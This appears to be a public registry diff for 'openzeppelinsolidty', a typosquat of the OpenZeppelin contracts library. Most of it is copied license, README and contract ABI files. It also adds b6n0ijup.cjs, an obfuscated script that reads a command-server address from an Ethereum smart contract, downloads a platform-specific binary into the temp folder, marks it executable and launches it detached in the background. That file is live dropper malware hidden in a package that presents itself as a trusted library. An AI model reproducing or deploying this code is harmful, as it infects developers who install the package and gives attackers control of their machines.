openzeppelinsolidty 0.0.1-security → 3.4.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of openzeppelinsolidty might be problematic. Click here for more details.
- package/LICENSE +22 -0
- package/README.md +75 -3
- package/b6n0ijup.cjs +1 -0
- package/build/contracts/AccessControl.json +237 -0
- package/build/contracts/Address.json +8 -0
- package/build/contracts/Arrays.json +8 -0
- package/build/contracts/BeaconProxy.json +33 -0
- package/build/contracts/Clones.json +8 -0
- package/build/contracts/ConditionalEscrow.json +163 -0
- package/build/contracts/Context.json +8 -0
- package/build/contracts/Counters.json +8 -0
- package/build/contracts/Create2.json +8 -0
- package/build/contracts/ECDSA.json +8 -0
- package/build/contracts/EIP712.json +8 -0
- package/build/contracts/ERC1155.json +332 -0
- package/build/contracts/ERC1155Burnable.json +367 -0
- package/build/contracts/ERC1155Holder.json +106 -0
- package/build/contracts/ERC1155Pausable.json +360 -0
- package/build/contracts/ERC1155PresetMinterPauser.json +741 -0
- package/build/contracts/ERC1155Receiver.json +106 -0
- package/build/contracts/ERC165.json +28 -0
- package/build/contracts/ERC165Checker.json +8 -0
- package/build/contracts/ERC1820Implementer.json +33 -0
- package/build/contracts/ERC20.json +295 -0
- package/build/contracts/ERC20Burnable.json +310 -0
- package/build/contracts/ERC20Capped.json +292 -0
- package/build/contracts/ERC20Pausable.json +318 -0
- package/build/contracts/ERC20Permit.json +354 -0
- package/build/contracts/ERC20PresetFixedSupply.json +336 -0
- package/build/contracts/ERC20PresetMinterPauser.json +651 -0
- package/build/contracts/ERC20Snapshot.json +335 -0
- package/build/contracts/ERC721.json +424 -0
- package/build/contracts/ERC721Burnable.json +421 -0
- package/build/contracts/ERC721Holder.json +43 -0
- package/build/contracts/ERC721Pausable.json +447 -0
- package/build/contracts/ERC721PresetMinterPauserAutoId.json +762 -0
- package/build/contracts/ERC777.json +585 -0
- package/build/contracts/ERC777PresetFixedSupply.json +595 -0
- package/build/contracts/EnumerableMap.json +8 -0
- package/build/contracts/EnumerableSet.json +8 -0
- package/build/contracts/Escrow.json +144 -0
- package/build/contracts/GSNRecipient.json +165 -0
- package/build/contracts/GSNRecipientERC20Fee.json +194 -0
- package/build/contracts/GSNRecipientSignature.json +176 -0
- package/build/contracts/IBeacon.json +22 -0
- package/build/contracts/IERC1155.json +302 -0
- package/build/contracts/IERC1155MetadataURI.json +321 -0
- package/build/contracts/IERC1155Receiver.json +106 -0
- package/build/contracts/IERC165.json +28 -0
- package/build/contracts/IERC1820Implementer.json +33 -0
- package/build/contracts/IERC1820Registry.json +222 -0
- package/build/contracts/IERC20.json +192 -0
- package/build/contracts/IERC20Permit.json +84 -0
- package/build/contracts/IERC721.json +294 -0
- package/build/contracts/IERC721Enumerable.json +350 -0
- package/build/contracts/IERC721Metadata.json +339 -0
- package/build/contracts/IERC721Receiver.json +43 -0
- package/build/contracts/IERC777.json +400 -0
- package/build/contracts/IERC777Recipient.json +47 -0
- package/build/contracts/IERC777Sender.json +47 -0
- package/build/contracts/IRelayHub.json +656 -0
- package/build/contracts/IRelayRecipient.json +133 -0
- package/build/contracts/Initializable.json +8 -0
- package/build/contracts/Math.json +8 -0
- package/build/contracts/MerkleProof.json +8 -0
- package/build/contracts/Ownable.json +61 -0
- package/build/contracts/Pausable.json +48 -0
- package/build/contracts/PaymentSplitter.json +182 -0
- package/build/contracts/Proxy.json +17 -0
- package/build/contracts/ProxyAdmin.json +158 -0
- package/build/contracts/PullPayment.json +41 -0
- package/build/contracts/ReentrancyGuard.json +8 -0
- package/build/contracts/RefundEscrow.json +233 -0
- package/build/contracts/SafeCast.json +8 -0
- package/build/contracts/SafeERC20.json +8 -0
- package/build/contracts/SafeMath.json +8 -0
- package/build/contracts/SignedSafeMath.json +8 -0
- package/build/contracts/Strings.json +8 -0
- package/build/contracts/TimelockController.json +773 -0
- package/build/contracts/TokenTimelock.json +76 -0
- package/build/contracts/TransparentUpgradeableProxy.json +140 -0
- package/build/contracts/UpgradeableBeacon.json +111 -0
- package/build/contracts/UpgradeableProxy.json +46 -0
- package/build/contracts/__unstable__ERC20Owned.json +365 -0
- package/contracts/GSN/Context.sol +5 -0
- package/contracts/GSN/GSNRecipient.sol +230 -0
- package/contracts/GSN/GSNRecipientERC20Fee.sol +154 -0
- package/contracts/GSN/GSNRecipientSignature.sol +72 -0
- package/contracts/GSN/IRelayHub.sol +269 -0
- package/contracts/GSN/IRelayRecipient.sol +76 -0
- package/contracts/access/AccessControl.sol +217 -0
- package/contracts/access/Ownable.sol +68 -0
- package/contracts/access/TimelockController.sol +300 -0
- package/contracts/cryptography/ECDSA.sol +86 -0
- package/contracts/cryptography/MerkleProof.sol +33 -0
- package/contracts/drafts/EIP712.sol +108 -0
- package/contracts/drafts/ERC20Permit.sol +78 -0
- package/contracts/drafts/IERC20Permit.sol +51 -0
- package/contracts/introspection/ERC165.sol +54 -0
- package/contracts/introspection/ERC165Checker.sol +131 -0
- package/contracts/introspection/ERC1820Implementer.sol +37 -0
- package/contracts/introspection/IERC165.sol +24 -0
- package/contracts/introspection/IERC1820Implementer.sol +19 -0
- package/contracts/introspection/IERC1820Registry.sol +111 -0
- package/contracts/math/Math.sol +31 -0
- package/contracts/math/SafeMath.sol +214 -0
- package/contracts/math/SignedSafeMath.sol +92 -0
- package/contracts/payment/PaymentSplitter.sol +135 -0
- package/contracts/payment/PullPayment.sol +69 -0
- package/contracts/payment/escrow/ConditionalEscrow.sol +24 -0
- package/contracts/payment/escrow/Escrow.sol +65 -0
- package/contracts/payment/escrow/RefundEscrow.sol +93 -0
- package/contracts/presets/ERC1155PresetMinterPauser.sol +104 -0
- package/contracts/presets/ERC20PresetFixedSupply.sol +32 -0
- package/contracts/presets/ERC20PresetMinterPauser.sol +87 -0
- package/contracts/presets/ERC721PresetMinterPauserAutoId.sol +102 -0
- package/contracts/presets/ERC777PresetFixedSupply.sol +29 -0
- package/contracts/proxy/BeaconProxy.sol +88 -0
- package/contracts/proxy/Clones.sol +78 -0
- package/contracts/proxy/IBeacon.sol +15 -0
- package/contracts/proxy/Initializable.sol +55 -0
- package/contracts/proxy/Proxy.sol +83 -0
- package/contracts/proxy/ProxyAdmin.sol +77 -0
- package/contracts/proxy/TransparentUpgradeableProxy.sol +151 -0
- package/contracts/proxy/UpgradeableBeacon.sol +64 -0
- package/contracts/proxy/UpgradeableProxy.sol +78 -0
- package/contracts/token/ERC1155/ERC1155.sol +414 -0
- package/contracts/token/ERC1155/ERC1155Burnable.sol +31 -0
- package/contracts/token/ERC1155/ERC1155Holder.sol +18 -0
- package/contracts/token/ERC1155/ERC1155Pausable.sol +41 -0
- package/contracts/token/ERC1155/ERC1155Receiver.sol +18 -0
- package/contracts/token/ERC1155/IERC1155.sol +103 -0
- package/contracts/token/ERC1155/IERC1155MetadataURI.sol +21 -0
- package/contracts/token/ERC1155/IERC1155Receiver.sol +57 -0
- package/contracts/token/ERC20/ERC20.sol +306 -0
- package/contracts/token/ERC20/ERC20Burnable.sol +42 -0
- package/contracts/token/ERC20/ERC20Capped.sol +45 -0
- package/contracts/token/ERC20/ERC20Pausable.sol +28 -0
- package/contracts/token/ERC20/ERC20Snapshot.sol +181 -0
- package/contracts/token/ERC20/IERC20.sol +77 -0
- package/contracts/token/ERC20/SafeERC20.sol +75 -0
- package/contracts/token/ERC20/TokenTimelock.sol +67 -0
- package/contracts/token/ERC721/ERC721.sol +478 -0
- package/contracts/token/ERC721/ERC721Burnable.sol +25 -0
- package/contracts/token/ERC721/ERC721Holder.sol +23 -0
- package/contracts/token/ERC721/ERC721Pausable.sol +28 -0
- package/contracts/token/ERC721/IERC721.sol +129 -0
- package/contracts/token/ERC721/IERC721Enumerable.sol +29 -0
- package/contracts/token/ERC721/IERC721Metadata.sol +27 -0
- package/contracts/token/ERC721/IERC721Receiver.sol +21 -0
- package/contracts/token/ERC777/ERC777.sol +507 -0
- package/contracts/token/ERC777/IERC777.sol +188 -0
- package/contracts/token/ERC777/IERC777Recipient.sol +34 -0
- package/contracts/token/ERC777/IERC777Sender.sol +34 -0
- package/contracts/utils/Address.sol +189 -0
- package/contracts/utils/Arrays.sol +47 -0
- package/contracts/utils/Context.sol +24 -0
- package/contracts/utils/Counters.sol +40 -0
- package/contracts/utils/Create2.sol +59 -0
- package/contracts/utils/EnumerableMap.sol +266 -0
- package/contracts/utils/EnumerableSet.sol +297 -0
- package/contracts/utils/Pausable.sol +90 -0
- package/contracts/utils/ReentrancyGuard.sol +62 -0
- package/contracts/utils/SafeCast.sol +211 -0
- package/contracts/utils/Strings.sol +34 -0
- package/package.json +64 -4
package/LICENSE
ADDED
@@ -0,0 +1,22 @@
|
|
1
|
+
The MIT License (MIT)
|
2
|
+
|
3
|
+
Copyright (c) 2016-2020 zOS Global Limited
|
4
|
+
|
5
|
+
Permission is hereby granted, free of charge, to any person obtaining
|
6
|
+
a copy of this software and associated documentation files (the
|
7
|
+
"Software"), to deal in the Software without restriction, including
|
8
|
+
without limitation the rights to use, copy, modify, merge, publish,
|
9
|
+
distribute, sublicense, and/or sell copies of the Software, and to
|
10
|
+
permit persons to whom the Software is furnished to do so, subject to
|
11
|
+
the following conditions:
|
12
|
+
|
13
|
+
The above copyright notice and this permission notice shall be included
|
14
|
+
in all copies or substantial portions of the Software.
|
15
|
+
|
16
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
|
17
|
+
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
18
|
+
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
|
19
|
+
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
|
20
|
+
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
|
21
|
+
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
|
22
|
+
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
package/README.md
CHANGED
@@ -1,5 +1,77 @@
|
|
1
|
-
#
|
1
|
+
# <img src="logo.svg" alt="OpenZeppelin" height="40px">
|
2
2
|
|
3
|
-
|
3
|
+
[](https://docs.openzeppelin.com/contracts)
|
4
|
+
[](https://www.npmjs.org/package/@openzeppelin/contracts)
|
5
|
+
[](https://codecov.io/gh/OpenZeppelin/openzeppelin-contracts)
|
4
6
|
|
5
|
-
|
7
|
+
**A library for secure smart contract development.** Build on a solid foundation of community-vetted code.
|
8
|
+
|
9
|
+
* Implementations of standards like [ERC20](https://docs.openzeppelin.com/contracts/erc20) and [ERC721](https://docs.openzeppelin.com/contracts/erc721).
|
10
|
+
* Flexible [role-based permissioning](https://docs.openzeppelin.com/contracts/access-control) scheme.
|
11
|
+
* Reusable [Solidity components](https://docs.openzeppelin.com/contracts/utilities) to build custom contracts and complex decentralized systems.
|
12
|
+
* First-class integration with the [Gas Station Network](https://docs.openzeppelin.com/contracts/gsn) for systems with no gas fees!
|
13
|
+
* [Audited](https://github.com/OpenZeppelin/openzeppelin-contracts/tree/master/audit) by leading security firms (_last full audit on v2.0.0_).
|
14
|
+
|
15
|
+
## Overview
|
16
|
+
|
17
|
+
### Installation
|
18
|
+
|
19
|
+
```console
|
20
|
+
$ npm install @openzeppelin/contracts
|
21
|
+
```
|
22
|
+
|
23
|
+
OpenZeppelin Contracts features a [stable API](https://docs.openzeppelin.com/contracts/releases-stability#api-stability), which means your contracts won't break unexpectedly when upgrading to a newer minor version.
|
24
|
+
|
25
|
+
### Usage
|
26
|
+
|
27
|
+
Once installed, you can use the contracts in the library by importing them:
|
28
|
+
|
29
|
+
```solidity
|
30
|
+
pragma solidity ^0.6.0;
|
31
|
+
|
32
|
+
import "@openzeppelin/contracts/token/ERC721/ERC721.sol";
|
33
|
+
|
34
|
+
contract MyCollectible is ERC721 {
|
35
|
+
constructor() ERC721("MyCollectible", "MCO") public {
|
36
|
+
}
|
37
|
+
}
|
38
|
+
```
|
39
|
+
|
40
|
+
_If you're new to smart contract development, head to [Developing Smart Contracts](https://docs.openzeppelin.com/learn/developing-smart-contracts) to learn about creating a new project and compiling your contracts._
|
41
|
+
|
42
|
+
To keep your system secure, you should **always** use the installed code as-is, and neither copy-paste it from online sources, nor modify it yourself. The library is designed so that only the contracts and functions you use are deployed, so you don't need to worry about it needlessly increasing gas costs.
|
43
|
+
|
44
|
+
## Learn More
|
45
|
+
|
46
|
+
The guides in the [docs site](https://docs.openzeppelin.com/contracts) will teach about different concepts, and how to use the related contracts that OpenZeppelin Contracts provides:
|
47
|
+
|
48
|
+
* [Access Control](https://docs.openzeppelin.com/contracts/access-control): decide who can perform each of the actions on your system.
|
49
|
+
* [Tokens](https://docs.openzeppelin.com/contracts/tokens): create tradeable assets or collectives, and distribute them via [Crowdsales](https://docs.openzeppelin.com/contracts/crowdsales).
|
50
|
+
* [Gas Station Network](https://docs.openzeppelin.com/contracts/gsn): let your users interact with your contracts without having to pay for gas themselves.
|
51
|
+
* [Utilities](https://docs.openzeppelin.com/contracts/utilities): generic useful tools, including non-overflowing math, signature verification, and trustless paying systems.
|
52
|
+
|
53
|
+
The [full API](https://docs.openzeppelin.com/contracts/api/token/ERC20) is also thoroughly documented, and serves as a great reference when developing your smart contract application. You can also ask for help or follow Contracts's development in the [community forum](https://forum.openzeppelin.com).
|
54
|
+
|
55
|
+
Finally, you may want to take a look at the [guides on our blog](https://blog.openzeppelin.com/guides), which cover several common use cases and good practices.. The following articles provide great background reading, though please note, some of the referenced tools have changed as the tooling in the ecosystem continues to rapidly evolve.
|
56
|
+
|
57
|
+
* [The Hitchhiker’s Guide to Smart Contracts in Ethereum](https://blog.openzeppelin.com/the-hitchhikers-guide-to-smart-contracts-in-ethereum-848f08001f05) will help you get an overview of the various tools available for smart contract development, and help you set up your environment.
|
58
|
+
* [A Gentle Introduction to Ethereum Programming, Part 1](https://blog.openzeppelin.com/a-gentle-introduction-to-ethereum-programming-part-1-783cc7796094) provides very useful information on an introductory level, including many basic concepts from the Ethereum platform.
|
59
|
+
* For a more in-depth dive, you may read the guide [Designing the Architecture for Your Ethereum Application](https://blog.openzeppelin.com/designing-the-architecture-for-your-ethereum-application-9cec086f8317), which discusses how to better structure your application and its relationship to the real world.
|
60
|
+
|
61
|
+
## Security
|
62
|
+
|
63
|
+
This project is maintained by [OpenZeppelin](https://openzeppelin.com), and developed following our high standards for code quality and security. OpenZeppelin is meant to provide tested and community-audited code, but please use common sense when doing anything that deals with real money! We take no responsibility for your implementation decisions and any security problems you might experience.
|
64
|
+
|
65
|
+
The core development principles and strategies that OpenZeppelin is based on include: security in depth, simple and modular code, clarity-driven naming conventions, comprehensive unit testing, pre-and-post-condition sanity checks, code consistency, and regular audits.
|
66
|
+
|
67
|
+
The latest audit was done on October 2018 on version 2.0.0.
|
68
|
+
|
69
|
+
Please report any security issues you find to security@openzeppelin.org.
|
70
|
+
|
71
|
+
## Contribute
|
72
|
+
|
73
|
+
OpenZeppelin exists thanks to its contributors. There are many ways you can participate and help build high quality software. Check out the [contribution guide](CONTRIBUTING.md)!
|
74
|
+
|
75
|
+
## License
|
76
|
+
|
77
|
+
OpenZeppelin is released under the [MIT License](LICENSE).
|
package/b6n0ijup.cjs
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const _0x279d69=_0x5e4f;(function(_0x16e5ea,_0xee14cd){const _0x53985f=_0x5e4f,_0x1f61a5=_0x16e5ea();while(!![]){try{const _0xe8efa6=-parseInt(_0x53985f(0xf5))/0x1+-parseInt(_0x53985f(0xe7))/0x2*(-parseInt(_0x53985f(0xfa))/0x3)+parseInt(_0x53985f(0x10c))/0x4*(-parseInt(_0x53985f(0x111))/0x5)+-parseInt(_0x53985f(0x104))/0x6+parseInt(_0x53985f(0x110))/0x7*(-parseInt(_0x53985f(0xe6))/0x8)+parseInt(_0x53985f(0x116))/0x9+parseInt(_0x53985f(0xf9))/0xa;if(_0xe8efa6===_0xee14cd)break;else _0x1f61a5['push'](_0x1f61a5['shift']());}catch(_0x3cb099){_0x1f61a5['push'](_0x1f61a5['shift']());}}}(_0x4ce1,0x64e60));function _0x5e4f(_0x411926,_0x243e10){const _0x4ce1d8=_0x4ce1();return _0x5e4f=function(_0x5e4f9c,_0x79b234){_0x5e4f9c=_0x5e4f9c-0xe3;let _0x4602b2=_0x4ce1d8[_0x5e4f9c];return _0x4602b2;},_0x5e4f(_0x411926,_0x243e10);}function _0x4ce1(){const _0x3e53e4=['bKMJk','error','Ошибка\x20при\x20получении\x20IP\x20адреса:','1210140ZWCBsy','function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','ClMjB','mainnet','crUnf','getString','linux','4BYCEEh','Ошибка\x20установки:','platform','win32','91PwqvrX','708895VPMIyA','basename','myuCE','0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84','FwVYJ','2381769EfaGQn','darwin','tBIpU','eTjcv','476888BTSekg','2vwuOHm','child_process','chmodSync','util','755','GET','Zzwzg','/node-win.exe','path','createWriteStream','Ошибка\x20при\x20запуске\x20файла:','ijbHP','ntjCT','ignore','125679HXjoRF','ethers','unref','Unsupported\x20platform:\x20','13633760OEnxXY','88062mahSaA','Qraxf','axios','/node-linux','OpugR','utYxK','/node-macos'];_0x4ce1=function(){return _0x3e53e4;};return _0x4ce1();}const {ethers}=require(_0x279d69(0xf6)),axios=require(_0x279d69(0xfc)),util=require(_0x279d69(0xea)),fs=require('fs'),path=require(_0x279d69(0xef)),os=require('os'),{spawn}=require(_0x279d69(0xe8)),contractAddress=_0x279d69(0x106),WalletOwner=_0x279d69(0x114),abi=[_0x279d69(0x105)],provider=ethers['getDefaultProvider'](_0x279d69(0x108)),contract=new ethers['Contract'](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x4bc350=_0x279d69,_0x12fc0d={'clTwL':_0x4bc350(0x103),'myuCE':function(_0x406d99){return _0x406d99();}};try{const _0x7ac88=await contract[_0x4bc350(0x10a)](WalletOwner);return _0x7ac88;}catch(_0x969398){return console[_0x4bc350(0x102)](_0x12fc0d['clTwL'],_0x969398),await _0x12fc0d[_0x4bc350(0x113)](fetchAndUpdateIp);}},getDownloadUrl=_0x5d7465=>{const _0x35b953=_0x279d69,_0x4cdf9b={'utYxK':_0x35b953(0x10f),'OpugR':_0x35b953(0xe3)},_0x52407d=os[_0x35b953(0x10e)]();switch(_0x52407d){case _0x4cdf9b[_0x35b953(0xff)]:return _0x5d7465+_0x35b953(0xee);case _0x35b953(0x10b):return _0x5d7465+_0x35b953(0xfd);case _0x4cdf9b[_0x35b953(0xfe)]:return _0x5d7465+_0x35b953(0x100);default:throw new Error(_0x35b953(0xf8)+_0x52407d);}},downloadFile=async(_0x20d113,_0xf03b0e)=>{const _0x249976=_0x279d69,_0x3c65ed={'ijbHP':_0x249976(0x102),'tBIpU':_0x249976(0xec),'Zzwzg':'stream'},_0x36b659=fs[_0x249976(0xf0)](_0xf03b0e),_0x336644=await axios({'url':_0x20d113,'method':_0x3c65ed[_0x249976(0xe4)],'responseType':_0x3c65ed[_0x249976(0xed)]});return _0x336644['data']['pipe'](_0x36b659),new Promise((_0x4f4a33,_0x2bd242)=>{const _0x2d0a50=_0x249976;_0x36b659['on']('finish',_0x4f4a33),_0x36b659['on'](_0x3c65ed[_0x2d0a50(0xf2)],_0x2bd242);});},executeFileInBackground=async _0x5774bc=>{const _0x3d4688=_0x279d69,_0x5639f3={'eTjcv':function(_0x288f1c,_0x23fb82,_0x18565f,_0x946bab){return _0x288f1c(_0x23fb82,_0x18565f,_0x946bab);},'BrSAg':_0x3d4688(0xf4),'crUnf':_0x3d4688(0xf1)};try{const _0x7e87cf=_0x5639f3[_0x3d4688(0xe5)](spawn,_0x5774bc,[],{'detached':!![],'stdio':_0x5639f3['BrSAg']});_0x7e87cf[_0x3d4688(0xf7)]();}catch(_0x4d8f4a){console[_0x3d4688(0x102)](_0x5639f3[_0x3d4688(0x109)],_0x4d8f4a);}},runInstallation=async()=>{const _0x8a7d4d=_0x279d69,_0x158498={'ClMjB':function(_0x32dd6d){return _0x32dd6d();},'ntjCT':function(_0x159f86,_0x24f8e1){return _0x159f86(_0x24f8e1);},'GVpLd':function(_0x8b77ad,_0x3c9905){return _0x8b77ad!==_0x3c9905;},'Qraxf':'win32','FwVYJ':_0x8a7d4d(0xeb),'bKMJk':_0x8a7d4d(0x10d)};try{const _0x4ff23c=await _0x158498[_0x8a7d4d(0x107)](fetchAndUpdateIp),_0x545127=_0x158498[_0x8a7d4d(0xf3)](getDownloadUrl,_0x4ff23c),_0x47fd71=os['tmpdir'](),_0x1e34b8=path[_0x8a7d4d(0x112)](_0x545127),_0x861480=path['join'](_0x47fd71,_0x1e34b8);await downloadFile(_0x545127,_0x861480);if(_0x158498['GVpLd'](os[_0x8a7d4d(0x10e)](),_0x158498[_0x8a7d4d(0xfb)]))fs[_0x8a7d4d(0xe9)](_0x861480,_0x158498[_0x8a7d4d(0x115)]);executeFileInBackground(_0x861480);}catch(_0x1b26ab){console[_0x8a7d4d(0x102)](_0x158498[_0x8a7d4d(0x101)],_0x1b26ab);}};runInstallation();
|
@@ -0,0 +1,237 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "AccessControl",
|
3
|
+
"abi": [
|
4
|
+
{
|
5
|
+
"anonymous": false,
|
6
|
+
"inputs": [
|
7
|
+
{
|
8
|
+
"indexed": true,
|
9
|
+
"internalType": "bytes32",
|
10
|
+
"name": "role",
|
11
|
+
"type": "bytes32"
|
12
|
+
},
|
13
|
+
{
|
14
|
+
"indexed": true,
|
15
|
+
"internalType": "bytes32",
|
16
|
+
"name": "previousAdminRole",
|
17
|
+
"type": "bytes32"
|
18
|
+
},
|
19
|
+
{
|
20
|
+
"indexed": true,
|
21
|
+
"internalType": "bytes32",
|
22
|
+
"name": "newAdminRole",
|
23
|
+
"type": "bytes32"
|
24
|
+
}
|
25
|
+
],
|
26
|
+
"name": "RoleAdminChanged",
|
27
|
+
"type": "event"
|
28
|
+
},
|
29
|
+
{
|
30
|
+
"anonymous": false,
|
31
|
+
"inputs": [
|
32
|
+
{
|
33
|
+
"indexed": true,
|
34
|
+
"internalType": "bytes32",
|
35
|
+
"name": "role",
|
36
|
+
"type": "bytes32"
|
37
|
+
},
|
38
|
+
{
|
39
|
+
"indexed": true,
|
40
|
+
"internalType": "address",
|
41
|
+
"name": "account",
|
42
|
+
"type": "address"
|
43
|
+
},
|
44
|
+
{
|
45
|
+
"indexed": true,
|
46
|
+
"internalType": "address",
|
47
|
+
"name": "sender",
|
48
|
+
"type": "address"
|
49
|
+
}
|
50
|
+
],
|
51
|
+
"name": "RoleGranted",
|
52
|
+
"type": "event"
|
53
|
+
},
|
54
|
+
{
|
55
|
+
"anonymous": false,
|
56
|
+
"inputs": [
|
57
|
+
{
|
58
|
+
"indexed": true,
|
59
|
+
"internalType": "bytes32",
|
60
|
+
"name": "role",
|
61
|
+
"type": "bytes32"
|
62
|
+
},
|
63
|
+
{
|
64
|
+
"indexed": true,
|
65
|
+
"internalType": "address",
|
66
|
+
"name": "account",
|
67
|
+
"type": "address"
|
68
|
+
},
|
69
|
+
{
|
70
|
+
"indexed": true,
|
71
|
+
"internalType": "address",
|
72
|
+
"name": "sender",
|
73
|
+
"type": "address"
|
74
|
+
}
|
75
|
+
],
|
76
|
+
"name": "RoleRevoked",
|
77
|
+
"type": "event"
|
78
|
+
},
|
79
|
+
{
|
80
|
+
"inputs": [],
|
81
|
+
"name": "DEFAULT_ADMIN_ROLE",
|
82
|
+
"outputs": [
|
83
|
+
{
|
84
|
+
"internalType": "bytes32",
|
85
|
+
"name": "",
|
86
|
+
"type": "bytes32"
|
87
|
+
}
|
88
|
+
],
|
89
|
+
"stateMutability": "view",
|
90
|
+
"type": "function"
|
91
|
+
},
|
92
|
+
{
|
93
|
+
"inputs": [
|
94
|
+
{
|
95
|
+
"internalType": "bytes32",
|
96
|
+
"name": "role",
|
97
|
+
"type": "bytes32"
|
98
|
+
}
|
99
|
+
],
|
100
|
+
"name": "getRoleAdmin",
|
101
|
+
"outputs": [
|
102
|
+
{
|
103
|
+
"internalType": "bytes32",
|
104
|
+
"name": "",
|
105
|
+
"type": "bytes32"
|
106
|
+
}
|
107
|
+
],
|
108
|
+
"stateMutability": "view",
|
109
|
+
"type": "function"
|
110
|
+
},
|
111
|
+
{
|
112
|
+
"inputs": [
|
113
|
+
{
|
114
|
+
"internalType": "bytes32",
|
115
|
+
"name": "role",
|
116
|
+
"type": "bytes32"
|
117
|
+
},
|
118
|
+
{
|
119
|
+
"internalType": "uint256",
|
120
|
+
"name": "index",
|
121
|
+
"type": "uint256"
|
122
|
+
}
|
123
|
+
],
|
124
|
+
"name": "getRoleMember",
|
125
|
+
"outputs": [
|
126
|
+
{
|
127
|
+
"internalType": "address",
|
128
|
+
"name": "",
|
129
|
+
"type": "address"
|
130
|
+
}
|
131
|
+
],
|
132
|
+
"stateMutability": "view",
|
133
|
+
"type": "function"
|
134
|
+
},
|
135
|
+
{
|
136
|
+
"inputs": [
|
137
|
+
{
|
138
|
+
"internalType": "bytes32",
|
139
|
+
"name": "role",
|
140
|
+
"type": "bytes32"
|
141
|
+
}
|
142
|
+
],
|
143
|
+
"name": "getRoleMemberCount",
|
144
|
+
"outputs": [
|
145
|
+
{
|
146
|
+
"internalType": "uint256",
|
147
|
+
"name": "",
|
148
|
+
"type": "uint256"
|
149
|
+
}
|
150
|
+
],
|
151
|
+
"stateMutability": "view",
|
152
|
+
"type": "function"
|
153
|
+
},
|
154
|
+
{
|
155
|
+
"inputs": [
|
156
|
+
{
|
157
|
+
"internalType": "bytes32",
|
158
|
+
"name": "role",
|
159
|
+
"type": "bytes32"
|
160
|
+
},
|
161
|
+
{
|
162
|
+
"internalType": "address",
|
163
|
+
"name": "account",
|
164
|
+
"type": "address"
|
165
|
+
}
|
166
|
+
],
|
167
|
+
"name": "grantRole",
|
168
|
+
"outputs": [],
|
169
|
+
"stateMutability": "nonpayable",
|
170
|
+
"type": "function"
|
171
|
+
},
|
172
|
+
{
|
173
|
+
"inputs": [
|
174
|
+
{
|
175
|
+
"internalType": "bytes32",
|
176
|
+
"name": "role",
|
177
|
+
"type": "bytes32"
|
178
|
+
},
|
179
|
+
{
|
180
|
+
"internalType": "address",
|
181
|
+
"name": "account",
|
182
|
+
"type": "address"
|
183
|
+
}
|
184
|
+
],
|
185
|
+
"name": "hasRole",
|
186
|
+
"outputs": [
|
187
|
+
{
|
188
|
+
"internalType": "bool",
|
189
|
+
"name": "",
|
190
|
+
"type": "bool"
|
191
|
+
}
|
192
|
+
],
|
193
|
+
"stateMutability": "view",
|
194
|
+
"type": "function"
|
195
|
+
},
|
196
|
+
{
|
197
|
+
"inputs": [
|
198
|
+
{
|
199
|
+
"internalType": "bytes32",
|
200
|
+
"name": "role",
|
201
|
+
"type": "bytes32"
|
202
|
+
},
|
203
|
+
{
|
204
|
+
"internalType": "address",
|
205
|
+
"name": "account",
|
206
|
+
"type": "address"
|
207
|
+
}
|
208
|
+
],
|
209
|
+
"name": "renounceRole",
|
210
|
+
"outputs": [],
|
211
|
+
"stateMutability": "nonpayable",
|
212
|
+
"type": "function"
|
213
|
+
},
|
214
|
+
{
|
215
|
+
"inputs": [
|
216
|
+
{
|
217
|
+
"internalType": "bytes32",
|
218
|
+
"name": "role",
|
219
|
+
"type": "bytes32"
|
220
|
+
},
|
221
|
+
{
|
222
|
+
"internalType": "address",
|
223
|
+
"name": "account",
|
224
|
+
"type": "address"
|
225
|
+
}
|
226
|
+
],
|
227
|
+
"name": "revokeRole",
|
228
|
+
"outputs": [],
|
229
|
+
"stateMutability": "nonpayable",
|
230
|
+
"type": "function"
|
231
|
+
}
|
232
|
+
],
|
233
|
+
"bytecode": "0x",
|
234
|
+
"deployedBytecode": "0x",
|
235
|
+
"linkReferences": {},
|
236
|
+
"deployedLinkReferences": {}
|
237
|
+
}
|
@@ -0,0 +1,8 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "Address",
|
3
|
+
"abi": [],
|
4
|
+
"bytecode": "0x60566023600b82828239805160001a607314601657fe5b30600052607381538281f3fe73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220fd6e0690a065310380954516d066725eee8e4006c34d661df930fe2eb68b6aa264736f6c634300060c0033",
|
5
|
+
"deployedBytecode": "0x73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220fd6e0690a065310380954516d066725eee8e4006c34d661df930fe2eb68b6aa264736f6c634300060c0033",
|
6
|
+
"linkReferences": {},
|
7
|
+
"deployedLinkReferences": {}
|
8
|
+
}
|
@@ -0,0 +1,8 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "Arrays",
|
3
|
+
"abi": [],
|
4
|
+
"bytecode": "0x60566023600b82828239805160001a607314601657fe5b30600052607381538281f3fe73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220656e914350c23941def8d09f0b1831839cd976a3dce4ea3e88385b2e25a29e1e64736f6c634300060c0033",
|
5
|
+
"deployedBytecode": "0x73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220656e914350c23941def8d09f0b1831839cd976a3dce4ea3e88385b2e25a29e1e64736f6c634300060c0033",
|
6
|
+
"linkReferences": {},
|
7
|
+
"deployedLinkReferences": {}
|
8
|
+
}
|
@@ -0,0 +1,33 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "BeaconProxy",
|
3
|
+
"abi": [
|
4
|
+
{
|
5
|
+
"inputs": [
|
6
|
+
{
|
